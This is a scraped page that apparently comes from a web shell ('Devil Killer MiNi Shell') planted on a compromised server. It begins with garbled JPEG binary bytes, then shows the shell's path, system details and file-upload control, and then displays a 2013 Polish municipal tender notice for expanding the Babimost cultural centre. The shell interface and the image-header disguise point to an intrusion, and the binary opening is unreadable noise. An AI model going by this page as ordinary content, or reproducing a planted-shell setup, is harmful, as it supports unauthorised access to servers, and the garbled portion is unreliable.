JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130219/70484-N-2013.html

<p class="kh_header"><b>Babimost: Rozbudowa i przebudowa Gminnego Ośrodka Kultury w Babimoście</b><br>
<b>Numer ogłoszenia: 70484 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Babimost , ul. Rynek 3, 66-110 Babimost, woj. lubuskie, tel. 068 3512034, faks 068 3512028.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.babimost.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i przebudowa Gminnego Ośrodka Kultury w Babimoście.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W zakres  inwestycji wchodzą wszystkie roboty objęte projektem budowlanym, a także specyfikacjami technicznymi wykonania i odbioru robót oraz ujęte w SIWZ do niniejszego postępowania.
Budynek pełni funkcję obiektu użyteczności publicznej i należy do Gminnego Ośrodka Kultury w Babimoście.  Zaprojektowana rozbudowa i przebudowa budynku ma na celu zwiększenie przestrzeni użytkowej Sali konferencyjnej  oraz związaną z tym przebudową korytarza i zaplecza gospodarczego oraz sanitarnego. W wyniku rozbudowy wyburzona zostanie ściana podłużna sali konferencyjnej, likwidacji ulegną istniejące sanitariaty, a w ich miejsce wybudowane zostaną nowe sanitariaty w halu wejścia  głównego do sali kinowej. Obiekt rozbudowywany zaprojektowano w technologii tradycyjnej  murowanej częściowo z elementów stalowych. Ściana zewnętrzna grubości 24cm  ocieplona styropianem grubości 15cm. W dobudowanej ścianie zlokalizowano 5 sztuk okien PCV. Konstrukcję nośną zaprojektowano w konstrukcji stalowej oraz z blachy trapezowej samonośnej  o parametrach podanych w projekcie. Strop ocieplony będzie wełną mineralną gr. 20cm. Obróbki blacharskie  i orynnowanie z blachy  tytan-cynk. 

Dane liczbowe
Szerokość elewacji części rozbudowywanej - 21,56 m2
Wysokość max ( H max ) części rozbudowywanej  - 5,04 m
Ilość kondygnacji części rozbudowywanej - 1 : przyziemie
Ilość kondygnacji całego budynku - 3 : piwnica, przyziemie, piętro
Powierzchnia użytkowa części rozbudowywanej - 148,19 m2
Powierzchnia użytkowa całego budynku -  1.579,0 m2
Powierzchnia zabudowy ( Pz ) części rozbudowywanej - 159,29 m2
Powierzchnia zabudowy ( Pz ) całego budynku - 1006,05 m2
Kubatura ( V ) części rozbudowywanej - 791,00 m3
Kubatura  całego budynku - 9.550,00 m3

Projektowane podłogi, posadzki, dachy - uwarstwienia
Szczegółowe uwarstwienia posadzki, dachu podano w części graficznej, oraz na rzutach kondygnacji w oznaczeniach pomieszczeń.

Wykończenie zewnętrzne
Podokienniki zewnętrzne - dostosowane do istniejącej elewacji, z blachy powlekanej.
Pokrycie dachu - dwie warstwy papy asfaltowej: warstwa podkładowa mocowana  mechanicznie oraz warstwa wierzchnia z papy termozgrzewalnej.
Rynny i rury spustowe - projektowane z blachy tytanowo-cynkowej gr.0,6mm; istniejące w kolizji z rozbudową należy przebudować.
Obróbki blacharskie - z blachy tytanowo-cynkowej gr. 0,6mm.
Kominy wentylacyjne - przewody wentylacyjne wyprowadzone ponad dach za pomocą kominków systemowych, w części rozbudowywanej kominki wyposażone w turbowenty.
Stolarka okienna - PCV, szyby zespolone, co najmniej w dwóch oknach w pomieszczeniu należy zastosować nawiewniki ciśnieniowe montowane w ramie okna.
Cokół - projektuje się uzupełnienie cokołu zgodnie z istniejącą elewacją z tynku strukturalnego (kamyczkowego).
Okładzina zewnętrzna ścian - na nowoprojektowanych ścianach zewnętrznych należy wykonać izolację cieplną - styropian gr.15cm, następnie siatkę z włókna szklanego, zaprawę klejącą, podkład pod tynki strukturalne i tynk mineralny o strukturze -baranka zgodny z kolorystyką obiektu istniejącego i ustaleniami z inwestorem.

Wykończenie wewnętrzne pomieszczeń
Sufity - rozbudowa wykończona systemem podwieszanych sufitów kasetonowych, w pomieszczeniach przebudowywanych sufity należy zeskrobać , wyrównać , miejscowo skuć,  zagruntować , wtopić siatkę, wykonać gładzie gipsowe zagruntować i pomalować 2-krotnie farbą akrylową lub silikatową  w kolorze białym.
Ściany istniejące sali konferencyjnej - wszystkie  istniejące tynki należy skuć, wykonać  nowe  tynki cementowo-wapienne  kat. III, nałożyć gładzie gipsowe następnie  pomalować dwukrotnie farbą akrylową lub silikatową kolorach pełnych uzgodnionych z inwestorem. Na wszystkich ścianach wewnętrznych 
w części  rozbudowywanej budynku wykonać tynki c.w. kat III, następnie nałożyć gładzie gipsowe, malowanie  farbami akrylowymi lub silikatowymi w kolorach pełnych. 
Ściany sanitariatów (WC) - glazura na całej wysokości ścian, spoiny wodoodporne.
Uwaga: styk terakoty podłogi z glazurą ścian wypełnić spoiną trwale plastyczną np. silikonem  sanitarnym z dodatkami grzybobójczymi.
Ściany oddzielające kabiny ustępowe, wykonać jako systemowe z płyty drewnopochodnych laminowanych mocowanych na profilach aluminiowych (np. SANIPOL lub inny równoważny)
Stolarka drzwi wewnętrznych - stolarka drzwi wewnętrznych pomieszczeń sanitarnych projektowana jako drzwi płytowe pełne w okleinie naturalnej (PORTA CLASSIC lub inny równoważny), z systemowymi ościeżnicami opaskowymi, regulowanymi, z otworami nawiewnymi (o pow. min. 220cm2) i zamkami łazienkowymi.
Parapety wewnętrzne - z konglomeratu szerokości 30cm.
Posadzki - projektowany nowy parkiet drewniany dębowy klasy I, zarówno w części rozbudowywanej jak i przebudowywanej części sali konferencyjnej. Parkiet w istniejącej części Sali konferencyjnej rozebrać, podłoże wyrównać, wykonać izolację przeciwwilgociową. Parkiet pomalować lakierem o wysokiej klasie ścieralności.  W pomieszczeniach: komunikacji, pomieszczeniu gospodarczym, nowo projektowanych pomieszczeniu WC należy skuć istniejącą posadzkę i wykonać nową posadzkę z płytek gresowych szkliwionych.

Instalacje w budynku
Instalacja c.o. z istniejącej kotłowni indywidualnej;
Instalacja wodociągowa - z przyłącza istniejącego;
Instalacja kanalizacji sanitarnej - do istniejącej kanalizacji sanitarnej. Przyłącze należy przebudować 
ze względu na występującą kolizję z projektowaną rozbudową;
Instalacja kanalizacji deszczowej - do istniejącej kanalizacji deszczowej. Przyłącze należy przebudować ze względu na występującą kolizję z projektowaną rozbudową;
Instalacja elektryczna - oświetleniowa i gniazd wtykowych;
Wentylacja grawitacyjna - z rur aluminiowych, wentylacja w pomieszczeniach WC ze wspomaganiem mechanicznym sprzężonym z oświetleniem;
Instalacja odgromowa - istniejącą instalację należy przebudować uwzględniając projektowaną rozbudowę.

Ochrona przeciwpożarowa
Założenia projektowe
Projektuje się budynek użyteczności publicznej niski w części podpiwniczony i częściowo posiadający piętro
Wymagana klasa odporności ogniowej - C, minimalna odporność ogniowa elementów konstrukcyjnych 60 minut,
Obciążenie ogniowe do 500 MJ m2
Dopuszczalna wielkość strefy pożarowej wynosi do 8 000m2
Budynek wykonano w klasie C odporności pożarowej - wszystkie projektowane elementy budynku posiadają wymaganą odporność ogniową,
Elementy stalowe konstrukcji nośnej rozbudowy należy zabezpieczyć farbą pęczniejąca, doprowadzając konstrukcje do R60 odporności ogniowej.
Salę konferencyjną należy wyposażyć w hydrant przeciwpożarowy wewnętrzny D25 30 oraz gaśnicę 6kg.

Opis techniczny do projektu konstrukcyjno - budowlanego
Fundamenty
- istniejące - ławy i stopy żelbetowe
- projektowana ława fundamentowa pod ściany konstrukcyjne rozbudowywanej Sali konferencyjnej 
z betonu C20 25 (B25) zbrojona podłużnie prętami 12, stal A-IIIN, strzemiona fi6 co 30cm. Pod fundamentami wykonać warstwę z chudego betonu C8 10 (B10) (wg projektu konstrukcyjnego). Poziom posadowienia ław fundamentowych min. 90cm poniżej poziomu terenu na pospółce zagęszczonej (gr.20cm) do IS większe równe 0,95.
- projektowane stopy fundamentowe pod słupy stalowe części rozbudowywanej Sali konferencyjnej o szer. 0,8m i wys. 0,8m przyległe do fundamentów istn. słupów. Wykonać z betonu C20 25 (B25), zbrojenie 
siatką fi8 15/15cm (dołem i górą), stal AIIIN. Pod fundamentami wykonać warstwę z chudego betonu C8/10 (B10). Posadowienie na pospółce zagęszczonej (gr.20cm) do ISwiększe równe0,95.
Ściany nośne
- istniejące mury ścian nośnych z materiałów drobnowymiarowych;
- projektowane ściany nośne murowane z bloczków gazobetonowych gr. 24cm na zaprawie klejowej.
Ściany wewnętrzne działowe: 
- projektuje się ścianki działowe pomieszczeń sanitarnych murowane z bloczków gazobetonowych lub silikatowych gr. 12 cm. 
Nadproża 
Nadproża zaprojektowano z belek żelbetowych  typ L-19 wg rysunków - alternatywa nadproża stalowe.
Wieńce - wieńce wylewane na budowie z betonu C25 30-B30 zbrojone prętami fi12 
Słupy
- słupy stalowe z rur o przekroju kwadratowym 120x120x4mm, słupy stężone poprzecznie ryglem umieszczonym poniżej poziomu głowicy.
Konstrukcja dachu
Projektowana konstrukcja  dachu nad częścią rozbudowywaną  z blachy trapezowej TR92 1,5 mocowanej mechanicznie do belek stalowych dwuteowych IPE 270 ze stali S235. Belki oparte na projektowanych słupach stalowych oraz na ścianie murowanej  i mocowane  do nich na śruby. Elementy należy zabezpieczyć farbą pęczniejącą  do wartości R60 odporności ogniowej. 

Szczegółowy zakres robót został określony  w projekcie budowlanym  i specyfikacjach technicznych wykonania i odbioru robót  - stanowiącym załączniki  do niniejszej SIWZ. Przedmiar robót  stanowi  jedynie  element pomocniczy  do kalkulacji  kosztów. 

Wykonawca  zobowiązany jest  do skalkulowania w ofercie wszystkich robót przewidzianych w projekcie budowlanym, opisanych w niniejszej specyfikacji, oraz innych niezbędnych dla prawidłowego  funkcjonowania obiektu  i uzyskania zakładanych efektów  rzeczowych.

Roboty nie ujęte przez Wykonawcę w ofercie, a niezbędne do wykonania robót objętych projektem budowlanym specyfikacjami technicznymi wykonania i odbioru robót oraz niniejszą SIWZ nie będą stanowiły robót dodatkowych. Wykonawcy nie będzie się należało dodatkowe wynagrodzenie za nie ujęcie w przedmiarze i ofercie Wykonawcy robót wynikających bezpośrednio i pośrednio  z projektu budowlanego. Definicja robót dodatkowych jest określona w projekcie umowy, którą Wykonawca  zaakceptował. Zadanie inwestycyjne będzie realizowane na postawie umowy ryczałtowej, gdzie przedmiotem umowy jest wykonanie rozbudowy
 i przebudowy budynku Gminnego Ośrodka Kultury w Babimoście w zakresie objętym projektem budowlanym wraz z branżami i osiągnięcie zakładanego efektu rzeczowego. Wykonawca  bezwzględnie musi ująć w ofercie wszystkie koszty związane z wykonaniem zadania również koszty uzupełniające takie jak: obsługę geodezyjną, koszty wykonania badań instalacji, koszty badania wody, koszty opracowania świadectwa energetycznego, koszty utylizacji materiałów
z rozbiórki, zabezpieczenie placu budowy, uporządkowanie placu budowy i inne dokładnie opisane w punkcie 15.5. niniejszej specyfikacji.

Inwestycja będzie współfinansowana ze środków Unii Europejskiej  w ramach działania Odnowa i Rozwój Wsi objętego  PROW na  lata 2007-2013.
W przypadku utraty  uzyskanego dofinansowania przez Gminę  z winy Wykonawcy pokrywa  On w pełnej wysokości utracone dofinansowanie wraz z kosztami pochodnymi, co przyjmuje do wiadomości i akceptuje.  
Wykonawca  jest zobowiązany do stosowania procedur zawartych w umowie o dofinansowanie  pomiędzy Gminą Babimost a Samorządem Województwa Lubuskiego.
Wykonawca wykona przedmiot zamówienia z materiałów własnych - wyrobów dopuszczonych do używania w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane ( Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm. ) oraz ustawy z dnia 16 kwiecień 2004 r. o wyrobach budowlanych ( Dz. U. z 2004 r. Nr 92, poz. 881 ze zm. ) oraz innych przepisów, o ile mają zastosowanie. W przypadku podania przez Zamawiającego nazw materiałów, producentów czy znaków towarowych należy je traktować jako przykładowe, mające na celu doprecyzowanie przedmiotu zamówienia oraz określające standard techniczny i jakościowy. Materiały do wykonania zamówienia należy przyjmować w kategorii i jakości nie niższej równoważnej niż te wskazane w SIWZ i załącznikach do niej. 
Wykonawca odpowiedzialny jest za powstałe w toku własnych prac odpady oraz za właściwy sposób postępowania z nimi, zgodnie z ustawą z dnia 27 kwietnia 2001 r. o odpadach ( Dz. U. z 2007 r. Nr 39, poz. 251 ze zm. ) oraz ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach ( Dz. U. 
z 2005 r. Nr 236, poz. 2007 ze zm. ). Wywóz odpadów budowlanych odbywa się na koszt Wykonawcy. 
Zamawiający zaleca, aby Wykonawca dokonał wizji lokalnej na terenie, gdzie mają być prowadzone roboty objęte przedmiotem zamówienia, celem uzyskania informacji niezbędnych do przygotowania oferty 
i wyceny robót budowlanych przewidzianych do wykonania zgodnie z postanowieniami SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości:  10.000,00zł ( słownie: dziesięć tysięcy  złotych 00/100). Wadium musi być wniesione przed terminem składania ofert. Wadium musi obejmować okres związania ofertą</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy: - posiadają uprawnienia do wykonywania określonej działalności lub czynności będącej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - Kierownik Budowy musi posiadać doświadczenie  w zakresie robót o równoważnym charakterze i wielkości tj. musi posiadać uprawnienia do kierowania robotami ogólnobudowlanymi, w okresie ostatnich trzech lat przed upływem terminu składnia ofert. Ocena spełnienia warunku wymaganego od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie informacji zawartych w dokumentach i oświadczeniach</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy wykażą wykonanie robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia tj.  - co najmniej jednej roboty budowlanej o podobnym charakterze 
i złożoności  tzn. należy przedstawić wykaz:
- co najmniej 1 roboty  polegającej na budowie lub rozbudowie budynku o kubaturze nie mniejszej niż 790m3 - każdy z wykazanych obiektów, oraz
- co najmniej 1 roboty polegającej na ułożeniu 160m2 płytek. 
Wykonawca jest zobowiązany  wykazać: rodzaj, wartość, datę  i miejsce wykonania robót oraz załączyć dokument potwierdzający, że roboty zostały wykonane z zasadami sztuki budowlanej i prawidłowo ukończone. Ocena spełnienia warunku wymaganego od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie informacji zawartych w dokumentach i oświadczeniach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonaia opisu sposobu oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy: - dysponują osobami zdolnymi do wykonania przedmiotu zamówienia i przedstawią wykaz osób i podmiotów, które będą zaangażowane do wykonania zamówienia wraz z danymi na temat ich kwalifikacji niezbędnych do wykonania przedmiotu zamówienia wraz 
z odpisami uprawnień budowlanych - Kierownik Budowy musi posiadać doświadczenie  w zakresie robót o równoważnym charakterze i wielkości tj. musi posiadać uprawnienia do kierowania robotami ogólnobudowlanymi, w okresie ostatnich trzech lat przed upływem terminu składnia ofert, a w  przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie.
Ocena spełnienia warunku wymaganego od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie informacji zawartych w dokumentach i oświadczeniach</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy: - znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie przedmiotu zamówienia tj.: przedłożą informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, w wysokości nie mniejszej niż 470.000,00PLN. Ocena spełnienia warunku wymaganego od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie informacji zawartych w dokumentach i oświadczeniach</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

